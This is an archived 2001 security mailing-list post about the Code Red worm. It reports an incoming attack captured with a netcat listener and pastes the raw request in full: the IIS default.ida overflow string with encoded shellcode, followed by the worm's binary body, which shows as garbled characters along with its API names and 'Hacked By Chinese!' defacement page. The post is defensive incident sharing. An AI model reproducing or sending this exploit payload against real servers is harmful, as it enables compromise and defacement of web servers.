Security Incidents mailing list archives

RE: Code Red, anyone?

From: kerveros <kerveros () compulink gr>
Date: Wed, 1 Aug 2001 20:09:49 +0300

Well it probably started.

Timestamp 17:02:55 GMT

HEX Dump attached

 
--------------------------------------------
C:\>nc -l -p 80 -o ida1.txt -vvv
listening on [any] 80 ...
connect to [195.242.154.8] from h56n2fls32o971.telia.com [217.208.81.56]
64857
GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
N%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%
u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
 Accept: */*
Content-length: 3569

UΜΉΒΉ↑☻  SVWΞ╜ϋ²  ¦Η   ╕¦¦¦¦≤τ╟Ζp¦      ώ
♂  ΠΖh¦  Ξ╜Ώ¦  dκ    ΚdΚ=    ώo
  ΠΖ`¦  ╟ΖΏ¦      ΜΖh¦  ΔϋΚΖΪ¦  ╟ΖX¦    ωwϋδ
  Δ╜p¦   ☼Ζ▌☺  ΜΞX¦  Β┴  ☺ ΚΞX¦  Β╜X¦     xu
╟ΖX¦    Ώ¬ΜΧX¦  3└fΜ☻=MZ  ☼Ζγ☺  ΜΞX¦  ΜQ<ΜΖX¦  3╔fΜ♀►Β∙PE  ☼Ζy☺
ΜΧX¦  ΜB<ΜΞX¦  
ΜT☺x¦ΧX¦  ΚΧT¦  ΜΖT¦  ΜH♀¦ΞX¦  ΚΞL¦  ΜΧL¦  Β:KERN☼Ζ3☺  ΜΖL¦  Βx¦EL32☼Ζ ☺
ΜΞX¦  
ΚΞ4¦  ΜΧT¦  ΜΖX¦  ¦B ΚΖL¦  ╟ΖH¦  
Έ▲ΜΞH¦  Δ┴☺ΚΞH¦  ΜΧL¦  Δ┬¦ΚΧL¦  ΜΖT¦  ΜΞH¦ 
 ;H↑☼Ξ└   ΜΧL¦  Μ☻ΜΞX¦  Β<☺GetP☼Ζι   ΜΧL¦  Μ☻ΜΞX¦  Β|☺¦rocA☼ΖΕ
ΜΧH¦  ¦ΧH¦  ¦ΧX
¦  ΜΖT¦  ΜH$3└fΜ¦
ΚΖL¦  ΜΞT¦  ΜQ►ΜΖL¦  ΞL► ΚΞL¦  ΜΧL¦  ¦ΧL¦  ¦ΧL¦  ¦ΧL¦  ¦ΧX¦  ΜΖT¦  ΜH∟Μ¶
   ώ▬¦  Ξ╜Ώ¦  Μdμ    Δ╜p¦   u¦ώ  ╟ΖL¦  ☺   Έ☼ΜΞL¦  Δ┴☺ΚΞL¦  ΜΧh¦  ☼╛☻Ζ└☼ΕΞ
ΜΞh
¦  ☼╛◄Δ·
u!ΜΖh¦  Δ└☺ΜΪP ΧΡ¦  ;ΪΡCKCKΚΖ4¦  Έ*ΜΪΜΞh¦  QΜΧ4¦  R Χp¦  ;ΪΡCKCK
ΜΞL¦  ΚΕΞΝ¦  Έ☼ΜΧh¦  Δ┬☺ΚΧh¦  ΜΖh¦  ☼Ζ╔t☻ΈέΜΧh¦  Δ┬☺ΚΧh¦  ώS   ΜΖh¦  Δ└☺ΚΖh¦
  ΜM
ΜΣΕ   ΚΧl¦  ╟ΖL¦  ¦   ╞Ζ╨¦  hΜΚΖ╤¦  ╟Ζ╒¦  [SS ╟Ζ┘¦  cxΡΡΜΜQ►ΚΧP¦  Δ╜P¦  
u&ΜΪj Ξ
ΖL¦  PΜΞh¦  QΜΜP Χl¦  ;ΪΡCKCKΔ╜P¦  d}\ΜΞP¦  Δ┴☺ΚΞP¦  ΜΧP¦  i╥ΞfΏPΚΧt¦  ΜΜΞP¦
  ΚH
►ΜΪΞΧ,¦  Rj ΞΖL¦  PΞΞ╨¦  Qj j  Χα¦  ;ΪΡCKCKώθ☺
ΜΪ Χν¦  ;ΪΡCKCKΚΖL¦  ΜΧL¦  Βέ  
 ΚΧL¦  Β╜L¦     ¦  t¦ώg☺  ΜΪh ▌m  Χι¦  ;ΪΡCKCKώΑ¦
ΠΖL¦  ΜΖ4¦  ΚΖ¦¦  ΜΞL¦  ΜΧ░¦ 
 Κ◄ΜΖL¦  ΜΞ╚¦  ΚH¦ΜΧh¦  ΚΧP¦  Έ☼ΜΖP¦  Δ└☺ΚΖP¦  ΜΞh¦  Β┴ ☺
9ΞP¦  s¦ΜΧP¦  Β:LMTHu
☻Έ☻Έ╦ΜΖP¦  Δ└¦ΜΞL¦  ΚΜΪΞΧH¦  Rj¦h @  ΜΖ¦¦  P Χρ¦  ;ΪΡCKCK╟ΖL¦  
Έ☼ΜΞL¦  Δ┴☺ΚΞ
L¦  Β╜L¦   0  }VΜΧ¦¦  ¦ΧL¦  Μ☻;Ζ░¦  u>ΜΞ¦¦  ¦ΞL¦  ΜΧ`¦  Κ◄ΜΪh
Q%☻ Χι¦  ;ΪΡCKCKΜΖ
¦¦  ¦ΖL¦  ΜΞ░¦  Έ☻ΈΠΜΪΞΧL¦  RΜΖH¦  Ph @  ΜΞ¦¦  Q Χρ¦  ;ΪΡCKCK¦☺   Ζ╥☼Εύ¦
ΜΪj hΑ
   j¦j j☺h   ΑΜΖh¦  Δ└cP Χε¦  ;ΪΡCKCKΚΖ0¦  Δ╜0¦   t΅¦☺
Ζ╔t▬ΜΪh   ¦ Χι¦  ;ΪΡCKC
KΈάΜΪΞΧ8¦  R ΧΦ¦  ;ΪΡCKCKΜΖ>¦  ΚΖL¦  ΜΞL¦  Βά    ΚΞL¦  Δ╜L¦  ¶☼ΝG☺  ¦☺
Ζ╥☼Ε:☺
 ΜΪΞΖ8¦  P ΧΦ¦  ;ΪΡCKCKΜΞ>¦  ΚΞL¦  ΜΧL¦  Βέ    ΚΧL¦  Δ╜L¦  ∟|΅╕☺
Ζ└t▬ΜΪh   ¦ Χ
ι¦  ;ΪΡCKCKΈάΜΪjd Χι¦  ;ΪΡCKCKΜΪj j☺j☻ Χ╕¦  ;ΪΡCKCKΚΖx¦  f╟Ζ|¦  ☻ f╟Ζ~¦  
P╟ΖΑ¦ 
 ╞ΚΏ[ΜΪj►ΞΞ|¦  QΜΧx¦  R Χ╝¦  ;ΪΡCKCK╟ΖL¦      Έ☼ΜΖL¦  Δ└☺ΚΖL¦  Β╜L¦   Α☺
}7ΜΪhϋ¦
   Χι¦  ;ΪΡCKCKΜΪj j☺ΞΞⁿ¦  QΜΧx¦  R Χ└¦  ;ΪΡCKCKΈχΜΪh
☺ Χι¦  ;ΪΡCKCKώ¦¦  ΜΖD¦ 
 ΚΖP¦  ΜΞP¦  ☼ψΞP¦  i╔ήY═ ΜΧP¦  i╥¦ά☺ ΜΖt¦  ¦┴¦╨ΚΧt¦  ΜΞt¦  i╔Δ3╧
Β┴S¦kΚΞt¦  ΜΧt
☻ ΚΖt¦  ΜΪjd Χι¦  ;ΪΡCKCKΜΪj j☺j☻ Χ╕¦  ;ΪΡCKCKΚΖx¦  f╟Ζ|¦  ☻ f╟Ζ~¦  
PΜΞt¦  ΚΞΑ¦
  ΜΪj►ΞΧ|¦  RΜΖx¦  P Χ╝¦  ;ΪΡCKCKΖ└☼ΖΎ☺  ΜΪj
j¦ΜΞh¦  QΜΧx¦  R Χ└¦  ;ΪΡCKCK╟ΖL¦  
    ΜΜHhΚΞd¦  Έ▲ΜΧd¦  Δ┬☺ΚΧd¦  ΜΖL¦  Δ└☺ΚΖL¦  ΜΞd¦  ☼╛◄Ζ╥t☻Έ╙ΜΪj
ΜΖL¦  PΜΜQhRΜΖx
¦  P Χ└¦  ;ΪΡCKCKΜΪj j☺ΜΞh¦  Δ┴¦QΜΧx¦  R Χ└¦  ;ΪΡCKCK╟ΖL¦  
ΜHdΚΞd¦  Έ▲ΜΧd¦  
Δ┬☺ΚΧd¦  ΜΖL¦  Δ└☺ΚΖL¦  ΜΞd¦  ☼╛◄Ζ╥t☻Έ╙ΜΪj
ΜΖL¦  PΜΜQdRΜΖx¦  P Χ└¦  ;ΪΡCKCK╟ΖL¦ 
     ΜΞh¦  Δ┴ΚΞd¦  Έ▲ΜΧd¦  Δ┬☺ΚΧd¦  ΜΖL¦  Δ└☺ΚΖL¦  ΜΞd¦  ☼╛◄Ζ╥t☻Έ╙ΜΪj
ΜΖL¦  PΜΞh
¦  Δ┴QΜΧx¦  R Χ└¦  ;ΪΡCKCKΜΜHpΚΞL¦  ΜΪj
ΜΧL¦  RΜΜHxQΜΧx¦  R Χ└¦  ;ΪΡCKCK╞Ζⁿ¦   Μ
Ϊj h ☺
ΞΖⁿ¦  PΜΞx¦  Q Χ─¦  ;ΪΡCKCKΚΖL¦  ΜΪΜΧx¦  R Χ╚¦  ;ΪΡCKCKώ♀√  Έ¦ϋΝΫ  Έ0XΔ└
¦UWSVPj<ΜΏΔ╞♀Vh ☺   t$( ►XP t$↑ P¦X^[_]  Ρϋ╦   ϋ{∙  ,7(nΕ2¦uΈ¦A
V4¦╕xV4¦╕xV4¦XPΜ
╜h¦  ΚG≥├ΜD$♀¦╕   ╟ ┌¦╢ 3└├ΈΉϋ±Ϊ  LoadLibraryA GetSystemTime CreateThread
Create
FileA Sleep GetSystemDefaultLangID VirtualProtect       infocomm.dll
TcpSockSend
        WS2_32.dll socket connect send recv closesocket         w3svc.dll
GET
?   HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
 Accept: */*
Content-length: 3569

 c:\notworm LMTH
<html><head><meta http-equiv="Content-Type" content="text/html;
charset=english"

<title>HELLO!</title></head><bady><hr size=5><font color="red"><p

align="center
">Welcome to http://www.worm.com !<br><br>Hacked By
Chinese!</font></hr></bady><
/html>

 sent 1, rcvd 4039

Attachment: ida1.txt
Description:

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

Re: Code Red, anyone?, (continued)
- - Re: Code Red, anyone? Seth Arnold (Aug 01)
- Re: Code Red, anyone? Pat Wilson (Aug 01)
  - Re: Code Red, anyone? jan (Aug 01)
  - Re: Code Red, anyone? Pluto (Aug 01)
- RE: Code Red, anyone? Thompson, John J (Aug 01)
- Re: Code Red, anyone? Alfred Huger (Aug 01)
  - Re: Code Red, anyone? Dirk Brockhausen (Aug 01)
  - Re: Code Red, anyone? Johannes B. Ullrich (Aug 01)
- Re: Code Red, anyone? Chris A. Mattingly (Aug 01)
- Re: Code Red, anyone? Ivan Andres Hernandez Puga (Aug 01)
- RE: Code Red, anyone? kerveros (Aug 01)
- RE: Code Red, anyone? Joe Lareau (Aug 01)